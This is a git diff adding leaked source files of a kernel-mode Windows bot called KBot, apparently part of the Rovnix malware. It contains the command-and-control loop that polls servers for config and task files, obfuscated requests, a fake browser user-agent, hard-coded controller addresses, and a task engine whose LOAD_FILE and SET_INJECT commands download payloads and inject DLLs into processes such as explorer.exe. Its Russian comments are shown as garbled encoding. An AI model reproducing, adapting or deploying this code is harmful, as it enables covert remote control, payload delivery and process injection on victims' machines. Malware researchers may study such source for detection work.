pSize, // Pointer to a variable that receives size of the buffer + ULONG Crc // CRC parameter of the request + ) +{ + NTSTATUS ntStatus = STATUS_INSUFFICIENT_RESOURCES; + ULONG bSize, HostIndex = KBotSelectHost(INVALID_INDEX); + PCHAR RequestStr, ParamStr, Uri, Buffer, ScriptName; + PGUID_EX Id; + + Id = (PGUID_EX)&g_KBotUserId.Id; + + if (ParamStr = KBotAlloc(PAGE_SIZE)) + { + if (Crc == 0) + Crc = RsaRandom(AppRand()); + + bSize = sprintf(ParamStr, szRequestFmt, KBOT_VERSION, Id->Part0, Id->Part1, Id->Part2, Id->Part3, + g_KBotConfig->ServerId, g_KBotConfig->GroupId, Crc); + + ASSERT(bSize < PAGE_SIZE); + +#ifdef _ENCRYPT_REQUEST_URI + if (ScriptName = GenScriptLine(ScriptUri)) + { + if (RequestStr = ObfuscateParamStr(ParamStr, (PRC6_KEY)g_KBotConfig->pKey)) + { + strtrim(RequestStr, "\r\n"); +#else + ScriptName = ScriptUri; + RequestStr = ParamStr; +#endif + if (Uri = KBotAlloc(strlen(RequestStr) + strlen(ScriptName) + 1)) + { + strcpy(Uri, ScriptName); + strcat(Uri, RequestStr); + + ntStatus = KBotRequest(g_KBotConfig->HostArray[HostIndex], Uri, Method, pBuffer, pSize); + if (!NT_SUCCESS(ntStatus)) + { + ULONG NewIndex = KBotSelectHost(HostIndex); + if (HostIndex != NewIndex) + ntStatus = KBotRequest(g_KBotConfig->HostArray[NewIndex], Uri, Method, pBuffer, pSize); + } + KBotFree(Uri); + } // if (pUri = KBotAlloc(bSize + strlen(ScriptName) + 1)) +#ifdef _ENCRYPT_REQUEST_URI + AppFree(RequestStr); + } + AppFree(ScriptName); + } +#endif + KBotFree(ParamStr); + } // if (ParamStr = KBotAlloc(PAGE_SIZE)) + + return(ntStatus); +} + + +// +// Requests a file using the specified script URI. +// Verifies the file digital signture. 
+// +static NTSTATUS KBotRequestAndCheckFile( + PCHAR ScriptUri, // Target script name template + PCHAR* pBuffer, // Pointer to a variable that receives pointer to a buffer with file data + PULONG pSize, // Pointer to a variable that receives size of the file buffer + ULONG Crc, // CRC parameter of the request + BOOL bUnsign // Specify TRUE if the unsigned data should be returned, otherwise returns original data + ) +{ + NTSTATUS ntStatus = STATUS_SUCCESS; + PCHAR Buffer; + ULONG Size = 0; + + if (NT_SUCCESS(ntStatus = KBotCommonRequest(ScriptUri, szGet, &Buffer, &Size, Crc))) + { +#ifdef _USE_DIGITAL_SIGNATURE + if (Size) + { + PCHAR uBuffer; + ULONG uSize; + // Try to check the received file digital signature. + // Return STATUS_SYSTEM_IMAGE_BAD_SIGNATURE if we have no valid public key or the file is not properly signed. + if (!g_KbotPublicKey || !(uSize = DsUnsign(Buffer, Size, &uBuffer, g_KbotPublicKey))) + { + // Signature verification failed + ntStatus = STATUS_SYSTEM_IMAGE_BAD_SIGNATURE; + KBotFree(Buffer); + } + else + { + if (bUnsign) + { + KBotFree(Buffer); + Buffer = uBuffer; + Size = uSize; + } + } + } // if (Size) +#endif + *pBuffer = Buffer; + *pSize = Size; + } // if (NT_SUCCESS(ntStatus = KBotCommonRequest(ScriptUri, szGet, &Buffer, &Size, Crc))) + + return(ntStatus); +} + + + +// +// Thread function. +// Requests config and task by a timer in a loop. 
+// +VOID KBotMainThread(PVOID Context) +{ + KTIMER ConfigTimer; + KTIMER TaskTimer; + PVOID WaitObjects[3] = {&g_KBotShutdownEvent, &ConfigTimer, &TaskTimer}; + NTSTATUS ntStatus; + LARGE_INTEGER Period; + ANSI_STRING aConfigName = RTL_CONSTANT_STRING(szKBotConfigFileName); + + ENTER_WORKER(); + + KdPrint(("KBOT: main thread started.\n")); + + KeInitializeTimer(&ConfigTimer); + KeInitializeTimer(&TaskTimer); + + Period.QuadPart = _RELATIVE(_MILLISECONDS(KBOT_WAIT_BEFORE_START)); + KeSetTimer(&ConfigTimer, Period, NULL); + KeSetTimer(&TaskTimer, Period, NULL); + + do // main loop + { + PCHAR Buffer = NULL; + ULONG bSize = 0; + + ntStatus = KeWaitForMultipleObjects(3, (PVOID*)&WaitObjects, WaitAny, Executive, KernelMode, FALSE, NULL, NULL); + + if (ntStatus < STATUS_WAIT_1 || ntStatus > STATUS_WAIT_2) + // g_KBotShutdownEvent signaled or any error occured, exiting + break; + + if (ntStatus == STATUS_WAIT_1) + { + // Config timer expired + ULONG ConfigCRC = g_KBotConfig->ConfigCRC; + + if (ConfigCRC == 0) + ConfigCRC = AppRand(); + + // Requesting a config + if (NT_SUCCESS(ntStatus = KBotRequestAndCheckFile(szConfigUri, &Buffer, &bSize, ConfigCRC, FALSE))) + { + if (bSize) + { + // Config file received + KdPrint(("KBOT: config file of %u bytes received\n", bSize)); + if (NT_SUCCESS(FsSaveFile(&aConfigName, Buffer, bSize))) + KBotLoadConfig(); + KBotFree(Buffer); + } + Period.QuadPart = _RELATIVE(_SECONDS(g_KBotConfig->ConfigPeriod)); + } + else + { + KdPrint(("KBOT: Config request failed with status 0x%X\n", ntStatus)); + Period.QuadPart = _RELATIVE(_SECONDS(g_KBotConfig->MinimumPeriod)); + } + + KeSetTimer(&ConfigTimer, Period, NULL); + } + else if (ntStatus == STATUS_WAIT_2) + { + // Task timer expired + if (NT_SUCCESS(ntStatus = KBotRequestAndCheckFile(szTaskUri, &Buffer, &bSize, AppRand(), TRUE))) + { + if (bSize) + { + // Task file received + KdPrint(("KBOT: task file of %u bytes received\n", bSize)); + ProcessTaskFile(Buffer, bSize, FALSE); + KBotFree(Buffer); 
+ } + Period.QuadPart = _RELATIVE(_SECONDS(g_KBotConfig->TaskPeriod)); + } + else + { + KdPrint(("KBOT: Task request failed with status 0x%X\n", ntStatus)); + Period.QuadPart = _RELATIVE(_SECONDS(g_KBotConfig->MinimumPeriod)); + } + + KeSetTimer(&TaskTimer, Period, NULL); + } + + } while(TRUE); + + LEAVE_WORKER(); + + UNREFERENCED_PARAMETER(Context); +} + +// +// Initializes KBOT user-agent string used in HTTP requests. +// This string contains machine architecture, OS version and default browser. +// +BOOL KBotInitUserAgent(VOID) +{ + BOOL Ret = FALSE; + ULONG i, OsMajorVersion, OsMinorVersion, OsBuildNumber; + PCHAR pArch = ""; + + if (g_KbotUserAgent = KBotAlloc(cstrlenA(szUserAgentFmt) + cstrlenA(szX64) + 8)) + { + PsGetVersion(&OsMajorVersion, &OsMinorVersion, &OsBuildNumber, NULL); +#ifdef _WIN64 + pArch = szX64; +#endif + i = sprintf(g_KbotUserAgent, szUserAgentFmt, OsMajorVersion, OsMinorVersion, pArch); + ASSERT(i < (cstrlenA(szUserAgentFmt) + cstrlenA(szX64) + 8)); + + Ret = TRUE; + } + return(Ret); +} + + + +// ---- Startup and clenup --------------------------------------------------------------------------------------------------- + +VOID KBotCleanup(VOID) +{ + // Check if g_KBotShutdownEvent initialized... 
+ if (g_KBotShutdownEvent.Header.Type) + // ...then set it to notify all workers + KeSetEvent(&g_KBotShutdownEvent, IO_NO_INCREMENT, FALSE); + + if (g_KbotPublicKey) + AppFree(g_KbotPublicKey); + + if (g_KbotUserAgent) + KBotFree(g_KbotUserAgent); +} + + +NTSTATUS KBotStartup(VOID) +{ + NTSTATUS ntStatus = STATUS_INSUFFICIENT_RESOURCES; + HANDLE hThread; + ULONG Size; + OBJECT_ATTRIBUTES oa = {0}; + + KdPrint(("KBOT version 1.0 started.\n")); + + do // not a loop + { + if (!KBotInitUserAgent()) + break; + + // Initializing HTTP client + if (!KHttpInit(&KBotAlloc, &KBotFree)) + break; + + // Initializing g_KBotShutdownEvent + KeInitializeEvent(&g_KBotShutdownEvent, NotificationEvent, FALSE); + + if (!GetJoinedData((PIMAGE_DOS_HEADER)BkImageBase, &g_KbotPublicKey, &Size, FALSE, CRC_PUBLIC_KEY, 0)) + g_KbotPublicKey = NULL; + + // Loading or creating user ID + KBotGetUserId(); + + // Loading or initializing config + if (!(NT_SUCCESS(ntStatus = KBotLoadConfig()))) + break; + + // Initializing and starting client main thread + InitializeObjectAttributes(&oa, NULL, OBJ_KERNEL_HANDLE, NULL, NULL); + ntStatus = PsCreateSystemThread(&hThread, GENERIC_ALL, &oa, NULL, NULL, &KBotMainThread, NULL); + + if (NT_SUCCESS(ntStatus)) + ZwClose(hThread); + + } while(FALSE); + + KdPrint(("KBOT: startup complete with status 0x%X\n", ntStatus)); + + if (!(NT_SUCCESS(ntStatus))) + KBotCleanup(); + + return(ntStatus); +} \ No newline at end of file diff --git a/Rovnix/_DUMP/a07f4bbbb21ca550a63641c413660e0f27cdff00.svn-base b/Rovnix/_DUMP/a07f4bbbb21ca550a63641c413660e0f27cdff00.svn-base new file mode 100644 index 000000000..6126bead2 --- /dev/null +++ b/Rovnix/_DUMP/a07f4bbbb21ca550a63641c413660e0f27cdff00.svn-base 
@@ -0,0 +1,230 @@ +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +// KBot project. +// +// module: tasks.c +// $Revision: 35 $ +// $Date: 2012-08-23 16:20:51 +0400 (Чт, 23 авг 2012) $ +// description: +// Tasks processing engine. + +#include +#include +#include +#define NTSTRSAFE_NO_DEPRECATE +#include + +#include "version.h" +#include "ntddkex.h" +#include "kdbg.h" +#include "bklib.h" + +#include "..\fslib\fslib.h" +#include "..\bkdrv\bkdrv.h" + +#include "..\kloader\kloader.h" + +#include "kbot.h" +#include "kbotinc.h" +#include "tasks.h" + + +// +// Processes LOAD_FILE command. +// Loads a file by HTTP from the specified URL and saves it into the VFS with the specified name. +// +static NTSTATUS CmdLoadFile( + PCHAR CmdLine + ) +{ + PCHAR Buffer, Host, Uri, URL = NULL, Name = NULL; + ULONG bSize, NumberParams = ParseCommandLine(CmdLine, &URL, &Name, NULL, NULL); + NTSTATUS ntStatus = STATUS_INVALID_PARAMETER; + ANSI_STRING aName; + + do // not a loop + { + if (NumberParams == 0) + break; + + if (Name == NULL || *Name == 0) + { + if (Name = strrchr(URL, '/')) + Name += 1; + } + + if (!Name) + break; + + // Splitting URL into Host and URI + if (Uri = strchr(URL, '/')) + { + if (Uri[1] == '/') + { + URL = Uri + 2; + Uri = strchr(URL, '/'); + } + + if (!Uri) + break; + } // if (Uri = strchr(URL, '/')) + else + break; + + if (!(Host = KBotAlloc((ULONG)(Uri - URL) + 1))) + { + ntStatus = STATUS_INSUFFICIENT_RESOURCES; + break; + } + + *Uri = 0; + strcpy(Host, URL); + *Uri = '/'; + + ntStatus = KBotRequest(Host, Uri, szGet, &Buffer, &bSize); + KBotFree(Host); + + if (!NT_SUCCESS(ntStatus) || bSize == 0) + break; + + RtlInitAnsiString(&aName, Name); + ntStatus = FsSaveFile(&aName, Buffer, bSize); + + KBotFree(Buffer); + + } while(FALSE); + + return(ntStatus); +} + +// +// Processes DELETE_FILE command. +// Deletes the specified file from the VFS. 
+// +static NTSTATUS CmdDeleteFile( + PCHAR CmdLine + ) +{ + NTSTATUS ntStatus = STATUS_INVALID_PARAMETER; + PCHAR Name = NULL; + ULONG NumberParams = ParseCommandLine(CmdLine, &Name, NULL, NULL, NULL); + ANSI_STRING aName; + + if (NumberParams != 0 && Name != NULL && *Name != 0) + { + RtlInitAnsiString(&aName, Name); + ntStatus = FsDeleteFile(&aName); + } + + return(ntStatus); +} + + +static NTSTATUS CmdSetInject( + PCHAR CmdLine + ) +{ + return(KldrAddInjectConfig(CmdLine)); +} + + +static NTSTATUS ProcessCommandLine( + PCHAR CmdLine + ) +{ + PCHAR Command, Parameters = NULL; + ULONG CmdLen; + ULONG CmdHash = 0; + NTSTATUS ntStatus = STATUS_INVALID_PARAMETER; + + KdPrint(("KBOT: processing command line \"%s\"\n", CmdLine)); + + do // not a loop + { + if (!ParseCommandLine(CmdLine, &Command, &Parameters, NULL, NULL) || Parameters == NULL) + break; + + strtrim(Parameters, " ="); + CmdLen = strlen(Command); + CmdHash = BkCRC32(Command, CmdLen); + + switch(CmdHash) + { + case CRC_LOAD_FILE: + ntStatus = CmdLoadFile(Parameters); + break; + case CRC_DELETE_FILE: + ntStatus = CmdDeleteFile(Parameters); + break; + case CRC_SET_INJECT: + ntStatus = CmdSetInject(Parameters); + break; + default: + KdPrint(("KBOT: Unknown command\n")); + break; + } // switch(CmdHash) + + } while(FALSE); + +#if _DBG + if (NT_SUCCESS(ntStatus)) + KdPrint(("KBOT: command processed\n")); + else if (ntStatus == STATUS_INVALID_PARAMETER) + KdPrint(("KBOT: invalid command line\n")); + else + KdPrint(("KBOT: command failed, status: %x\n", ntStatus)); +#endif + + return(ntStatus); +} + + +NTSTATUS ProcessTaskFile( + PCHAR Buffer, + ULONG bSize, + BOOL bMustSucceed + ) +{ + PCHAR NewBuffer, CmdLine; + ULONG i = 0; + NTSTATUS ntStatus = STATUS_INSUFFICIENT_RESOURCES; + + // Allocating new buffer for the task file and adding extra NULL-chat to it's end. 
+ if (NewBuffer = KBotAlloc(bSize + 1)) + { + memcpy(NewBuffer, Buffer, bSize); + NewBuffer[bSize] = 0; + + Buffer = NewBuffer; + CmdLine = NewBuffer; + + while(Buffer[i]) + { + while(Buffer[i]) + { // check if there are end of line (EOFL) chars + if (Buffer[i] == 10 || Buffer[i] == 13) + { // replace all EOFL chars with 0 + do + { + Buffer[i] = 0; + i+=1; + } while(Buffer[i] == 10 || Buffer[i] == 13); + break; + } + i+=1; + } // while(CmdStrings[i]) + + CmdLine = strtrim(CmdLine, " \t"); + if (*CmdLine != ';') + { + // Process single command + ntStatus = ProcessCommandLine(CmdLine); + if (!NT_SUCCESS(ntStatus) && bMustSucceed) + break; + } + CmdLine = &Buffer[i]; + } // while(CmdStrings[i]) + KBotFree(NewBuffer); + } // if (CmdLine = KBotAlloc(bSize + 1)) + + return(ntStatus); +} \ No newline at end of file diff --git a/Rovnix/_DUMP/a57f6b893f4ed542a67bb36ff2c1b9eb3616894d.svn-base b/Rovnix/_DUMP/a57f6b893f4ed542a67bb36ff2c1b9eb3616894d.svn-base new file mode 100644 index 000000000..fa9ba9427 --- /dev/null +++ b/Rovnix/_DUMP/a57f6b893f4ed542a67bb36ff2c1b9eb3616894d.svn-base 
@@ -0,0 +1,24 @@ +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +// KBot project. +// +// module: tasks.h +// $Revision: 13 $ +// $Date: 2012-02-20 18:55:12 +0400 (Пн, 20 фев 2012) $ +// description: +// Tasks processing engine. + +// Command CRC32 hashes +#define CRC_LOAD_FILE 0x8655a116 +#define CRC_DELETE_FILE 0x7aa3ded9 +#define CRC_SET_INJECT 0x249c4b3d +#define CRC_GET_INJECT 0x0ad96aaf + + +// Supported commands +// Note that command names are case-sensitive, but command parameters are not. + +// LOAD_FILE http://myhost.com/myfile.dll myfile32.dll - downloads file http://myhost.com/myfile.dll and saves it to the VFS +// as \MYFILE32.DLL +// DELETE_FILE myfile32.dll - deletes file \MYFILE32.DLL from the VFS +// SET_INJECT myfile32.dll explorer.exe iexplore.exe - requests the KLOADER to inject \MYFILE32.DLL into the specified processes + diff --git a/Rovnix/_DUMP/acb825dea26f9d507358df3cfd5842da35421bf7.svn-base b/Rovnix/_DUMP/acb825dea26f9d507358df3cfd5842da35421bf7.svn-base new file mode 100644 index 000000000..10434f977 --- /dev/null +++ b/Rovnix/_DUMP/acb825dea26f9d507358df3cfd5842da35421bf7.svn-base 
@@ -0,0 +1,91 @@ +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +// KBot project. +// +// module: kbot.h +// $Revision: 33 $ +// $Date: 2012-07-16 18:27:23 +0400 (Пн, 16 июл 2012) $ +// description: +// Kernel-mode client program. +// Connects over the KIP to one of the specified C&C servers and receives specially formed configuration files and commands. + +#define _ENCRYPT_REQUEST_URI TRUE +#define _USE_DIGITAL_SIGNATURE TRUE + +#define KBOT_VERSION 0x100 + +#define KBOT_WAIT_BEFORE_START 10 // milliseconds + +#define KBOT_DEFAULT_CONFIG_PERIOD 60 // seconds +#define KBOT_DEFAULT_TASK_PERIOD 60 // seconds +#define KBOT_MINIMUM_REQUEST_PERIOD 60 // seconds + +#define KBOT_CONTENT_BUFFER_SIZE 0x1000 // bytes + +#define szKBotConfigFileName "KBOT.INI" +#define szKBotUserIdFileName "USER.ID" + +#define CRC_PUBLIC_KEY 0xe1285e64 +#define CRC_KBOT_INI 0x507fbe32 +#define CRC_GROUP 0x656b798a +#define CRC_TASK_PERIOD 0x7c440bb2 +#define CRC_CONFIG_PERIOD 0x986016fd +#define CRC_HOSTS 0xd0665bf6 +#define CRC_KEY 0xe3c816dc + +#define szRequestFmt "version=%u&user=%x%x%x%x&server=%u&id=%u&crc=%x" +#define szUserAgentFmt "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT %1u.%1u;%s SV1)" +#define szX64 " x64;" + +#ifdef _ENCRYPT_REQUEST_URI + #define SERVER_DEFAULT_KEY "0123456789ABCDEF" + + #define szConfigUri "/c%s.php?%s=" + #define szTaskUri "/t%s.php?%s=" +#else + #define szConfigUri "/config.php?" + #define szTaskUri "/task.php?" 
+#endif + +#define KBOT_DEFAULT_HOST_LIST " 10.30.29.241 " +#define INVALID_INDEX (-1) + + +typedef struct _KBOT_CONFIG +{ +#if DBG + ULONG Magic; +#endif + ULONG ConfigCRC; + + ULONG ConfigPeriod; // seconds + ULONG TaskPeriod; // seconds + ULONG MinimumPeriod; // seconds + + ULONG ServerId; + ULONG GroupId; + + PCHAR* HostArray; + PCHAR pHostList; + ULONG HostCount; + ULONG HostIndex; + + PCHAR pKey; +} KBOT_CONFIG, *PKBOT_CONFIG; + +typedef struct _KBOT_USER +{ + GUID Id; // current user ID +} KBOT_USER, *PKBOT_USER; + +#define KBOT_CONFIG_MAGIC 'TOBK' +#define ASSERT_KBOT_CONFIG(x) ASSERT(x->Magic == KBOT_CONFIG_MAGIC) + +#define KBOT_DEFAULT_SERVER_ID 12 +#define KBOT_DEFAULT_GROUP_ID 1012 + + +PCHAR g_KbotUserAgent; + + +NTSTATUS KBotStartup(VOID); +VOID KBotCleanup(VOID); \ No newline at end of file diff --git a/Rovnix/_DUMP/d22b5fccfd1d2dfa72dde85bd2eaef39ff2b795e.svn-base b/Rovnix/_DUMP/d22b5fccfd1d2dfa72dde85bd2eaef39ff2b795e.svn-base new file mode 100644 index 000000000..d32bc5cf9 --- /dev/null +++ b/Rovnix/_DUMP/d22b5fccfd1d2dfa72dde85bd2eaef39ff2b795e.svn-base @@ -0,0 +1,27 @@ +TARGETNAME = kbot +TARGETTYPE = DRIVER_LIBRARY + +!IF $(FREEBUILD) +TARGETPATH=..\lib\Release +TARGETPATHLIB=..\lib\Release +!ELSE +TARGETPATH=..\lib\Debug +TARGETPATHLIB=..\lib\Debug +!ENDIF + + +BUFFER_OVERFLOW_CHECKS=0 +C_DEFINES=$(C_DEFINES) /Gz + +!IF $(FREEBUILD) +MSC_OPTIMIZATION = /O1 /Oi +MSC_WARNING_LEVEL=/W3 /WX +MSC_STDCALL = 1 +!ENDIF + +INCLUDES= ..\inc + +SOURCES= kbot.c \ + config.c \ + tasks.c \ + sendrecv.c diff --git a/Rovnix/_DUMP/d5c1d6905845df042a43e0c0db166725bac4ea70.svn-base b/Rovnix/_DUMP/d5c1d6905845df042a43e0c0db166725bac4ea70.svn-base new file mode 100644 index 000000000..81dd71f58 --- /dev/null +++ b/Rovnix/_DUMP/d5c1d6905845df042a43e0c0db166725bac4ea70.svn-base 
@@ -0,0 +1,22 @@ +; Êîíôèãóðàöèîííûé ôàéë äëÿ ïðîãðàììû KBOT +; Ýòîò ôàéë ìîæåò áûòü ïðèêðåïëåí ê äðàéâåðó ïðè ïîìîùè óòèëèòû FJ. +; Ïðè ñòàðòå, ïðîãðàììà èùåò ýòîò ôàéë íà VFS, çàòåì â äðàéâåðå. + +; Ñïèñîê õîñòîâ äëÿ ïîèñêà óïðàâëÿþùåãî ñåðâåðà. Èìåíà ðàçäåëÿþòñÿ çàïÿòûìè. +Hosts = 10.30.22.114 + +; ID ãðóïïû áîòà. Ëþáîå ÷èñëî íå áîëüøå 2147483647. +Group = 1000 + +; RC6-êëþ÷ äëÿ îáôóñêàöèè çàïðîñîâ ê ñåðâåðó. +; Íåçàâèñèìî îò äëèííû ñòðîêè èñïîëüçóþòñÿ òîëüêî ïåðâûå 16 áàéò. +; Åñëè êëþ÷ ìåíüøå 16 áàéò, òî ïðîãðàììà äîïîëíèò åãî íóëÿìè. +Key = 0123456789ABCDEF + +; Êàê ÷àñòî çàïðàøèâàòü êîíôèã (ñåê). +ConfigPeriod = 60 + +; Êàê ÷àñòî çàïðàøèâàòü çàäà÷ó (ñåê). +TaskPeriod = 60 + + diff --git a/Rovnix/_DUMP/e19909da33e75132d50f2bef8a222ba4ad243aeb.svn-base b/Rovnix/_DUMP/e19909da33e75132d50f2bef8a222ba4ad243aeb.svn-base new file mode 100644 index 000000000..6893fe9e9 Binary files /dev/null and b/Rovnix/_DUMP/e19909da33e75132d50f2bef8a222ba4ad243aeb.svn-base differ diff --git a/Rovnix/_DUMP/e3424d3927016883e3a9c8036856f8643f2089f2.svn-base b/Rovnix/_DUMP/e3424d3927016883e3a9c8036856f8643f2089f2.svn-base new file mode 100644 index 000000000..473418ac0 --- /dev/null +++ b/Rovnix/_DUMP/e3424d3927016883e3a9c8036856f8643f2089f2.svn-base 
@@ -0,0 +1,31 @@ +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +// KBot project. +// +// module: kbotinc.h +// $Revision: 35 $ +// $Date: 2012-08-23 16:20:51 +0400 (Чт, 23 авг 2012) $ +// description: +// Project common structures and definitions. + + +#define szGet "GET" + +// from kbot.c + +PCHAR g_KbotPublicKey; +PVOID KBotAlloc(ULONG Size); +VOID KBotFree(PVOID Mem); + +// from sendrecv.c +NTSTATUS KBotRequest(PCHAR Host, PCHAR Uri, PCHAR Method, PCHAR* pBuffer, PULONG pSize); + +// from tasks.c +NTSTATUS ProcessTaskFile(PCHAR Buffer, ULONG bSize, BOOL bMustSucceed); + +// from config.c +PKBOT_CONFIG volatile g_KBotConfig; +KBOT_USER g_KBotUserId; + +NTSTATUS KBotLoadConfig(VOID); +VOID KBotGetUserId(VOID); + diff --git a/Rovnix/_DUMP/e4c23fad23de4586c1770b2be5df0ed2726df970.svn-base b/Rovnix/_DUMP/e4c23fad23de4586c1770b2be5df0ed2726df970.svn-base new file mode 100644 index 000000000..b1f71e638 --- /dev/null +++ b/Rovnix/_DUMP/e4c23fad23de4586c1770b2be5df0ed2726df970.svn-base @@ -0,0 +1,32 @@ +; Êîíôèãóðàöèîííûé ôàéë äëÿ óòèëèòû FJ +; Îïèñûâàåò äðàéâåðà è áèáëèîòåêè, êîòîðûå íåîáõîäèìî ïðèêðåïèòü ê èíñòàëëåðó +; Ïðè çàïóñêå èíñòàëëåð îïðåäåëÿåò ðàçðÿäíîñòü ÎÑ è óñòàíàâëèâàåò ñîîòâåòñòâóþùèé äðàéâåð + +; Èñõîäíûé ôàéë èíñòàëëåðà (ìîæåò áûòü êàê EXE, òàê è DLL) +SOURCE: ..\bin\Release\i386\setupdll.dll + +; Ôàéë, â êîòîðûé áóäåò çàïèñàí ðåçóëüòàò +OUT: Release\setupdll.dll + +; Íà÷àëüíûé çàãðóç÷èê +BIN: Release\vbr.com + + +; Äðàéâåð äëÿ 32õ-áèòíîé ÎÑ +DRV: ..\bin\Release\i386\kloader.sys + +; Îòêðûòûé RSA-êëþ÷ äëÿ ïðîâåðêè ïîäïèñè ôàéëîâ +BIN: public.key + +; Êîíôèãóðàöèîííûé ôàéë ìîäóëÿ KBOT +BIN: kbot.ini + + +; Äðàéâåð äëÿ 64õ-áèòíîé ÎÑ +DRV: ..\bin\release\amd64\kloader.sys + +; Îòêðûòûé RSA-êëþ÷ äëÿ ïðîâåðêè ïîäïèñè ôàéëîâ +BIN: public.key + +; Êîíôèãóðàöèîííûé ôàéë ìîäóëÿ KBOT +BIN: kbot.ini \ No newline at end of file 
diff --git a/Rovnix/_DUMP/e96f819fc48f397dd8b5c1f5d4a54abfb12d730f.svn-base b/Rovnix/_DUMP/e96f819fc48f397dd8b5c1f5d4a54abfb12d730f.svn-base new file mode 100644 index 000000000..77e816f26 --- /dev/null +++ b/Rovnix/_DUMP/e96f819fc48f397dd8b5c1f5d4a54abfb12d730f.svn-base 
@@ -0,0 +1,50 @@ +KBOT - NT-kernel bot program +---------------------------- + +Ïðîãðàììà ïðåäíàçíà÷åíà äëÿ ñêà÷èâàíèÿ, ïîñðåäñòâîì HTTP, ôàéëîâ, ñîõðàíèÿ èõ íà VFS è + ðåãèñòðàöèè â ìîäóëå KLDR äëÿ èíæåêòà â çàäàííûå ïðîöåññû. + +Ïîääåðæèâàåìûå ÎÑ: XP - WIN7. +Ïîääåðæèâàåìûå àðõèòåêòóðû: x86, AMD64(EM64T). + +Ïðîåêò cîáèðàåòñÿ â ñòàòè÷åñêè ïîäêëþ÷àåìóþ áèáëèîòåêó(LIB), êîòîðàÿ ëèíêóåòñÿ ê äðàéâåðó. + +Ïðè ïåðâîì çàïóñêå ïðîãðàììà ãåíåðèðóåò 16-áèòíûé ID ïîëüçîâàòåëÿ è ñîõðàíÿåò åãî íà VFS â ôàéë \USER.ID + äàëüíåéøåì ID ïîëüçîâàòåëÿ íå èçìåíÿåòñÿ è ïåðåäàåòñÿ êàæäûé ðàç ïðè çàïðîñå ê ñåðâåðó óïðàâëåíèÿ. + +Ïðîãðàììà îñóùåñòâëÿåò äâà òèïà HTTP çàïðîñîâ ê ñåðâåðó óïðàâëåíèÿ: +- çàïðîñ êîôèã-ôàéëà; +- çàïðîñ ôàéëà êîìàíä; + +Ïðîãðàììà ïîääåðæèâàåò îáôóñêàöèþ HTTP çàïðîñîâ. +Äëÿ ýòîãî ñòðîêà êàæäîãî çàïðîñà øèôðóåòñÿ ñ ïîìîùüþ àëãîðèòìà RC6 è ïåðåâîäèòñÿ â ôîðìàò BASE64. + +Ïðîãðàììà ïîääåðæèâàåò ïðîâåðêó öèôðîâîé ïîäïèñè è øèôðîâàíèå êîíôèã-ôàéëîâ è ôàéëîâ êîìàíä. +Äëÿ ýòîãî ê äðàéâåðó ïðèêðåïëÿåòñÿ ôàéë public.key, ñîäåðæàùèé îòêðûòûé RSA-êëþ÷. +Ñ ïîìîùüþ ýòîãî êëþ÷à îñóùåñòâëÿåòñÿ ðàñøèôðîâêà è ïðîâåðêà ïîäïèñè ïîëó÷åííîãî ôàéëà. +Åñëè ôàéë íå ïðîõîäèò ïðîâåðêó, òî îí èãíîðèðóåòñÿ. + + +Ôàéë êîíôèãóðàöèè + +Ïðîãðàììà ðàáîòàåò íà îñíîâå íàñòðîåê ïðîïèñàííûõ â ôàéëå êîíôèãóðàöèè (êîíôèã-ôàéë). +Êîíôèã-ôàéë ìîæåò õðàíèòüñÿ íà VFS, ëèáî ìîæåò áûòü ïðèêðåïëåí íåïîñðåäñòâåííî ê äðàéâåðó. +Ïðè çàïóñêå ïðîãðàììû ñíà÷àëà èùåòñÿ ôàéë íà VFS, è åñëè åãî íåò - èñïîëüçóåòñÿ ïðèêðåïëåííûé êîíôèã-ôàéë. +Ïðèìåð êîíôèã-ôàéëà ñ îïèñàíèåì: \BkBuild\kbot.ini +Ïðè ïîëó÷åíèå íîâîãî êîíôèã-ôàéëà îí ñîõðàíÿåòñÿ íà VFS â ôàéë \KBOT.INI Ñóùåñòâóþùèé KBOT.INI çàìåíÿåòñÿ. 
+ + +Ôàéë êîìàíä + +Òåêñòîâûé ôàéë ñîäåðæàùèé îäíó èëè íåñêîëüêî èç ñëåäóþùèõ êîìàíä: + + LOAD_FILE [èìÿ ôàéëà íà VFS] - ñêà÷èâàåò ôàéë ïî çàäàííîé ññûëêå è ñîõðàíÿåò íà VFS ñ çàäàííûì èìåíåì + + DELETE_FILE <èìÿ ôàéëà íà VFS> - óäàëÿåò óêàçàííûé ôàéë ñ VFS + + SET_INJECT <èìÿ ôàéëà íà VFS> <ñïèñîê ïðîöåññîâ> - çàäàåò èíæåêò óêàçàííîãî ôàéëà (êàê ïðàâèëî DLL) â + óêàçàííûå â ñïèñêå ïðîöåññû. Âñå çàäàííûå èíæåêòû ïðèìåíÿþòñÿ íåìåäëåííî è ñîõðàíÿþòñÿ + â ôàéëå \INJECTS.SYS íà VFS, òàê, ÷òîáû áûòü àêòèâíûìè ïîñëå ïåðåçàãðóçêè ÎÑ. + ×òîáû óäàëèòü èíæåêò èñïîëüçóåòñÿ êîìàíäà "SET_INJECT <èìÿ ôàéëà íà VFS>" áåç ñïèñêà ïðîöåññîâ. + + Èìåíà êîìàíä ÷óâñòâèòåëüíû ê ðåãèñòðó, ïàðàìåòðû - íåò. diff --git a/Rovnix/_DUMP/ed66ad26d6c472a1b42290deb2f169a2b3dfc424.svn-base b/Rovnix/_DUMP/ed66ad26d6c472a1b42290deb2f169a2b3dfc424.svn-base new file mode 100644 index 000000000..8bdea1019 --- /dev/null +++ b/Rovnix/_DUMP/ed66ad26d6c472a1b42290deb2f169a2b3dfc424.svn-base @@ -0,0 +1,159 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/Rovnix/_DUMP/f0923275b362e3a05ac77fcb6d3a12e18cdcfad9.svn-base b/Rovnix/_DUMP/f0923275b362e3a05ac77fcb6d3a12e18cdcfad9.svn-base new file mode 100644 index 000000000..58189757d --- /dev/null +++ b/Rovnix/_DUMP/f0923275b362e3a05ac77fcb6d3a12e18cdcfad9.svn-base @@ -0,0 +1,7 @@ +# +# DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source +# file to this component. This file merely indirects to the real make file +# that is shared by all the driver components of the Windows NT DDK +# + +!INCLUDE $(NTMAKEENV)\makefile.def diff --git a/Rovnix/_DUMP/readme.txt b/Rovnix/_DUMP/readme.txt new file mode 100644 